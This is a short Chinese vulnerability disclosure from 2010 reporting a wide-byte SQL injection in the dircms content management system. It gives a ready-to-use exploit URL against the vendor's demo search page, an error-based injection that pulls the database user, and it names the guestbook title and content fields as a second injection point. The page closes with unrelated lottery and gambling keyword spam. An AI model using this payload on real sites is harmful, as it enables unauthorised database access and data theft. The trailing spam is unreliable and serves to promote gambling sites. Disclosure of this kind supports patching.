• dircms宽字节注入漏洞

    //------------------------------------
    Name: dircms
    Site: www.dircms.net
    Desc: 宽字节带来的注入问题
    Author: tojen (tojen.me at gmail.com)
    Date: 2010/3/8
    //--------------------------------------

    描述:无意间黑盒发现dircms存在宽字节带来的注入问题,虽然流行过一段时间,貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题:
    1http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=&wylx=%BF
        这个就不多说了
        exp:

    http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=%BF'and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x3a)%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23%23


        123.png 
    2.http://demo.dircms.net/lifecms/guestbook/index.php?action=post    这个地方类似于帝国留言本那个宽字节注入,标题和内容处可以利用宽字节带入SQL语句执行

    相关文章
    相关标签/搜索
    90885公牛网站彩霸王白小姐一肖中特马2020马会免费资料大全白小姐中特网400500好彩堂中特网三肖中特期期准黄大仙